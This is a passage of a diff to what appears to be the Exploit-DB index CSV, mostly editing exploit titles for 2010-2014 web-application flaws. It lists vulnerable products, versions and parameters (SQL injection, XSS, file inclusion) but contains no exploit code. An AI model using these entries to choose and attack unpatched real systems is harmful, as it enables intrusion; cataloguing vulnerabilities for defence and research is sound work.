Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 +33683,platforms/php/webapps/33683.txt,"Article Friendly - 'Filename' Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,cr4wl3r,php,webapps,0 -33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Parameter Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0 +33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0 33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 -33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Parameter Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0 +33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0 33706,platforms/php/webapps/33706.txt,"Drupal < 5.22/6.16 - Multiple Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0 @@ -33804,102 +33805,102 @@ id,file,description,date,author,platform,type,port 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Persistent Cross-Site Scripting",2014-06-11,rob222,php,webapps,0 -33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 -33716,platforms/php/webapps/33716.txt,"Saskia's ShopSystem - 'id' Parameter Local File Inclusion",2010-03-05,cr4wl3r,php,webapps,0 +33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 +33716,platforms/php/webapps/33716.txt,"Saskia's ShopSystem - 'id' Local File Inclusion",2010-03-05,cr4wl3r,php,webapps,0 33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,multiple,webapps,0 -33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Parameter Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 +33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 33720,platforms/asp/webapps/33720.txt,"Pre E-Learning Portal - 'search_result.asp' SQL Injection",2010-03-08,NoGe,asp,webapps,0 33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX 4.2 - 'post.aspx' Cross-Site Scripting",2010-03-08,Liscker,asp,webapps,0 33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0 33723,platforms/php/webapps/33723.html,"KDPics 1.18 - 'admin/index.php' Authentication Bypass",2010-03-08,snakespc,php,webapps,0 -33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' Parameter SQL Injection",2010-03-07,"Andrés Gómez",php,webapps,0 +33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' SQL Injection",2010-03-07,"Andrés Gómez",php,webapps,0 33726,platforms/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 - Insecure Cookie Authentication Bypass",2010-02-16,indoushka,php,webapps,0 33728,platforms/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam - 'LoginPage.aspx' Cross-Site Scripting",2010-03-09,Lament,asp,webapps,0 -33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Parameter Cross-Site Scripting",2010-03-10,Liscker,asp,webapps,0 +33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Cross-Site Scripting",2010-03-10,Liscker,asp,webapps,0 33731,platforms/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 - Login SQL Injection",2010-03-10,"Yaniv Miron",multiple,webapps,0 33732,platforms/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting",2010-03-10,ITSecTeam,php,webapps,0 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0 -33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0 -33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0 +33760,platforms/multiple/webapps/33760.txt,"(Multiple Products) - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0 +33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Multiple SQL Injections",2010-03-15,Isfahan,asp,webapps,0 33740,platforms/hardware/webapps/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,webapps,0 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS - Multiple SQL Injections",2010-03-11,MustLive,php,webapps,0 -33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusion",2010-03-11,eidelweiss,php,webapps,0 +33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusions",2010-03-11,eidelweiss,php,webapps,0 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps,0 33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps,0 40351,platforms/php/webapps/40351.txt,"Jobberbase 2.0 - Multiple Vulnerabilities",2016-09-08,"Ross Marks",php,webapps,80 -33756,platforms/php/webapps/33756.txt,"Joomla! Component com_seek - 'id' Parameter SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 -33757,platforms/php/webapps/33757.txt,"Joomla! Component com_d-greinar - 'maintree' Parameter Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0 +33756,platforms/php/webapps/33756.txt,"Joomla! Component com_seek - 'id' SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 +33757,platforms/php/webapps/33757.txt,"Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0 33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS - 'manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,asp,webapps,0 -33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Parameter Cross-Site Scripting / Session Fixation",2010-03-15,indoushka,php,webapps,0 +33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Cross-Site Scripting / Session Fixation",2010-03-15,indoushka,php,webapps,0 33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal - 'index.php' SQL Injection",2010-03-15,"Easy Laster",php,webapps,0 33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - dijit\tests\_testCommon.js theme Parameter Cross-Site Scripting",2010-03-15,"Adam Bixby",multiple,webapps,0 -33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 - doh\runner.html Multiple Parameter Cross-Site Scripting",2010-03-15,"Adam Bixby",multiple,webapps,0 -33766,platforms/php/webapps/33766.txt,"Joomla! Component com_as - 'catid' Parameter SQL Injection",2010-03-16,N2n-Hacker,php,webapps,0 +33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 - 'doh\runner.html' Multiple Cross-Site Scripting Vulnerabilities",2010-03-15,"Adam Bixby",multiple,webapps,0 +33766,platforms/php/webapps/33766.txt,"Joomla! Component com_as - 'catid' SQL Injection",2010-03-16,N2n-Hacker,php,webapps,0 33787,platforms/php/webapps/33787.txt,"RepairShop2 - 'index.php' Prod Parameter Cross-Site Scripting",2010-03-23,kaMtiEz,php,webapps,0 -33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Inclusion",2010-03-17,7Safe,php,webapps,0 -33771,platforms/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' Parameter SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 +33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Local File Inclusion",2010-03-17,7Safe,php,webapps,0 +33771,platforms/php/webapps/33771.txt,"Joomla! Component com_alert - 'q_item' SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"PHPBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps,0 33773,platforms/php/webapps/33773.txt,"tenfourzero.net Shutter 0.1.4 - 'admin.html' Multiple SQL Injections",2010-03-18,blake,php,webapps,0 33776,platforms/php/webapps/33776.txt,"Kempt SiteDone 2.0 - 'detail.php' Cross-Site Scripting / SQL Injection",2010-03-18,d3v1l,php,webapps,0 33777,platforms/php/webapps/33777.txt,"PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-19,Liscker,php,webapps,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM - 'ucschcancelproc.jsp' Open redirection",2010-03-22,Lament,jsp,webapps,0 -33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusion",2010-03-23,eidelweiss,php,webapps,0 +33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusions",2010-03-23,eidelweiss,php,webapps,0 33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,php,webapps,0 33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting",2010-03-19,5ubzer0,php,webapps,0 33785,platforms/jsp/webapps/33785.txt,"agXchange ESM - 'ucquerydetails.jsp' Cross-Site Scripting",2010-03-23,Lament,jsp,webapps,0 33788,platforms/php/webapps/33788.pl,"PHPAuthent 0.2.1 - 'useradd.php' Multiple HTML Injection Vulnerabilities",2010-03-23,Yoyahack,php,webapps,0 33792,platforms/hardware/webapps/33792.txt,"Motorola SBG901 Wireless Modem - Cross-Site Request Forgery",2014-06-17,"Blessen Thomas",hardware,webapps,0 -33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module - 'id' Parameter SQL Injection",2010-03-23,Palyo34,php,webapps,0 -33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products - Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 -33795,platforms/php/webapps/33795.txt,"Joomla! Component com_aml_2 - 'art' Parameter SQL Injection",2010-03-23,Metropolis,php,webapps,0 -33796,platforms/php/webapps/33796.txt,"Joomla! Component com_cb - 'cat' Parameter SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 -33797,platforms/php/webapps/33797.txt,"Joomla! Component com_jresearch - 'Controller' Parameter Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 +33793,platforms/php/webapps/33793.txt,"Kasseler CMS News Module - 'id' SQL Injection",2010-03-23,Palyo34,php,webapps,0 +33794,platforms/php/webapps/33794.txt,"SpringSource (Multiple Products) - Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 +33795,platforms/php/webapps/33795.txt,"Joomla! Component com_aml_2 - 'art' SQL Injection",2010-03-23,Metropolis,php,webapps,0 +33796,platforms/php/webapps/33796.txt,"Joomla! Component com_cb - 'cat' SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 +33797,platforms/php/webapps/33797.txt,"Joomla! Component com_jresearch - 'Controller' Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0 34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 -33812,platforms/php/webapps/33812.txt,"Joomla! Component com_weblinks - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 +33812,platforms/php/webapps/33812.txt,"Joomla! Component com_weblinks - 'id' SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 33813,platforms/php/webapps/33813.html,"WordPress Plugin Fuctweb CapCC 1.0 - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 -33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 -33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 +33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 +33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 -33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Inclusion",2010-04-07,mat,php,webapps,0 -33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug - Multiple Local File Inclusion",2010-02-24,ITSecTeam,php,webapps,0 +33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Multiple Local File Inclusions",2010-04-07,mat,php,webapps,0 +33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug - Multiple Local File Inclusions",2010-02-24,ITSecTeam,php,webapps,0 33822,platforms/hardware/webapps/33822.sh,"D-Link DSL-2760U-E1 - Persistent Cross-Site Scripting",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 -33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,php,webapps,0 -33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS - 'id' Parameter Unspecified Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps,0 +33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,php,webapps,0 +33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS - 'id' Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost - 'view_ad.php' Cross-Site Scripting",2010-04-07,indoushka,php,webapps,0 33830,platforms/php/webapps/33830.txt,"Lunar CMS 3.3 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-06-21,LiquidWorm,php,webapps,0 33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,cp77fk4r,php,webapps,0 -33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Parameter Arbitrary File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 -33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusion",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 -33840,platforms/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 +33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Arbitrary File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 +33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusions",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 +33840,platforms/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 -33998,platforms/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 +33998,platforms/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0 -33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting",2010-04-24,Liscker,php,webapps,0 -33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 +33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Cross-Site Scripting",2010-04-24,Liscker,php,webapps,0 +33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' SQL Injection",2010-04-09,"Easy Laster",php,webapps,0 33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0 -34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 +34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,hardware,webapps,0 33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution",2014-06-25,LiquidWorm,php,webapps,0 34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injections",2010-06-14,"High-Tech Bridge SA",php,webapps,0 -33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Parameter Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 +33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 33874,platforms/php/webapps/33874.txt,"Ektron CMS400.NET 7.5.2 - Multiple Vulnerabilities",2010-04-26,"Richard Moore",php,webapps,0 33875,platforms/php/webapps/33875.txt,"HuronCMS - 'index.php' Multiple SQL Injections",2010-03-30,mat,php,webapps,0 33882,platforms/php/webapps/33882.txt,"CyberCMS - 'faq.php' SQL Injection",2009-11-26,hc0de,php,webapps,0 33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 - 'index.php' Cross-Site Scripting",2010-04-26,indoushka,php,webapps,0 -33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 - ZLanguage.php lang Parameter Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 +33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 - 'ZLanguage.php?lang' Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 - 'index.php' func Parameter Cross-Site Scripting",2010-04-13,"High-Tech Bridge SA",php,webapps,0 33887,platforms/cgi/webapps/33887.txt,"Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities",2014-06-27,"Onur Alanbel (BGA)",cgi,webapps,0 33888,platforms/php/webapps/33888.txt,"ProArcadeScript - 'search.php' Cross-Site Scripting",2010-04-27,Sid3^effects,php,webapps,0 @@ -33909,16 +33910,16 @@ id,file,description,date,author,platform,type,port 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - Cross-Site Request Forgery",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33906,platforms/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps,0 33908,platforms/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,php,webapps,0 -33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'Username' Parameter SQL Injection",2010-04-28,"John Leitch",php,webapps,0 +33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'Username' SQL Injection",2010-04-28,"John Leitch",php,webapps,0 33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection",2010-05-07,Liscker,php,webapps,0 33967,platforms/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0 33969,platforms/php/webapps/33969.txt,"eFront 3.x - 'ask_chat.php' SQL Injection",2010-05-09,"Stefan Esser",php,webapps,0 33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 - URI Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Inclusion / HTML Injection",2010-04-30,"Jordi Chancel",php,webapps,0 33914,platforms/php/webapps/33914.txt,"4x CMS - 'login.php' Multiple SQL Injections",2010-03-21,cr4wl3r,php,webapps,0 -33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' Parameter SQL Injection",2010-04-30,"Stefan Esser",php,webapps,0 +33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' SQL Injection",2010-04-30,"Stefan Esser",php,webapps,0 33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - 'archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps,0 -33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' Parameter SQL Injection",2010-05-02,indoushka,php,webapps,0 +33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' SQL Injection",2010-05-02,indoushka,php,webapps,0 33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 - 'upload.php' Arbitrary File Upload",2010-05-01,The.Morpheus,php,webapps,0 33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection",2010-05-01,ekse,php,webapps,0 33921,platforms/php/webapps/33921.txt,"IslamSound - Multiple SQL Injections",2010-05-03,JIKO,php,webapps,0 @@ -33929,25 +33930,25 @@ id,file,description,date,author,platform,type,port 33959,platforms/asp/webapps/33959.txt,"Consona - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta",asp,webapps,0 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081 33933,platforms/php/webapps/33933.txt,"ThinkPHP 2.0 - 'index.php' Cross-Site Scripting",2010-02-09,zx,php,webapps,0 -33934,platforms/php/webapps/33934.txt,"eZoneScripts - Multiple Scripts Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps,0 -33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 +33934,platforms/php/webapps/33934.txt,"eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps,0 +33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,cr4wl3r,php,webapps,0 33937,platforms/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 -33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,cp77fk4r,java,webapps,0 +33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting",2010-02-06,cp77fk4r,java,webapps,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps,0 33946,platforms/php/webapps/33946.txt,"EmiratesHost - Insecure Cookie Authentication Bypass",2010-02-01,jago-dz,php,webapps,0 -33947,platforms/php/webapps/33947.txt,"Last Wizardz - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",php,webapps,0 -33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' Parameter SQL Injection",2010-01-31,"Sec Attack Team",cfm,webapps,0 +33947,platforms/php/webapps/33947.txt,"Last Wizardz - 'id' SQL Injection",2010-01-31,"Sec Attack Team",php,webapps,0 +33948,platforms/cfm/webapps/33948.txt,"Site Manager 3.0 - 'id' SQL Injection",2010-01-31,"Sec Attack Team",cfm,webapps,0 33950,platforms/php/webapps/33950.txt,"HAWHAW - 'newsread.php' SQL Injection",2010-01-31,s4r4d0,php,webapps,0 34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent Cross-Site Scripting",2014-07-18,Vulnerability-Lab,cgi,webapps,3378 -33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Parameter Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 +33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps,0 33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0 -33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site 